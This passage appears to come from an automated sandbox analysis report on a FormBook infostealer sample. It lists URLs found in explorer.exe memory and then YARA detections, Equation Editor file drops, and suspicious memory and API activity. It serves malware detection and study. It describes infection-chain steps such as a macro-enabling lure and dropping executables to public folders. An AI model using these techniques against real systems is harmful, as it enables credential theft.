            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: explorer.exe, 00000006.00000000.2192186293.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
            Source: vbc.exe, 00000004.00000002.2189207331.0000000002371000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: explorer.exe, 00000006.00000000.2200577415.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: explorer.exe, 00000006.00000000.2197607706.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: explorer.exe, 00000006.00000000.2198231538.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: explorer.exe, 00000006.00000000.2198231538.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
            Source: explorer.exe, 00000006.00000000.2197607706.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
            Source: explorer.exe, 00000006.00000000.2209306525.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: explorer.exe, 00000006.00000000.2192186293.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2198231538.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/

            E-Banking Fraud:

            Yara detected FormBook
            Source: Yara match, File source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE

            System Summary:

            Malicious sample detected (through community Yara rule)
            Source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
            Source: Screenshot number: 4, Screenshot OCR: document is protected " t9 19 20 21 22 23 Open the document in If this document was 24 Mkroso
            Office equation editor drops PE file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\Public\vbc.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
            Source: C:\Users\Public\vbc.exe, Memory allocated: 76E20000 page execute and read and write
            Source: C:\Users\Public\vbc.exe, Memory allocated: 76D20000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Memory allocated: 76E20000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Memory allocated: 76D20000 page execute and read and write
            Source: C:\Windows\SysWOW64\raserver.exe, Memory allocated: 76E20000 page execute and read and write
            Source: C:\Windows\SysWOW64\raserver.exe, Memory allocated: 76D20000 page execute and read and write
            Source: C:\Users\Public\vbc.exe, Code function: 4_2_003A015C NtQueryInformationProcess,
            Source: C:\Users\Public\vbc.exe, Code function: 4_2_003A014F NtQueryInformationProcess,
            Source: C:\Users\Public\vbc.exe, Code function: 4_2_003A0B59 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_00419D50 NtCreateFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_00419E00 NtReadFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_00419E80 NtClose,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_00419F30 NtAllocateVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_00419D4B NtCreateFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_00419DFE NtReadFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_00419DA4 NtCreateFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_00419E7A NtClose,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_00419F2B NtAllocateVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_009100C4 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_00910048 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_00910078 NtResumeThread,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0090F9F0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0090F900 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0090FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0090FAE8 NtQueryInformationProcess,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0090FBB8 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0090FB68 NtFreeVirtualMemory,LdrInitializeThunk,
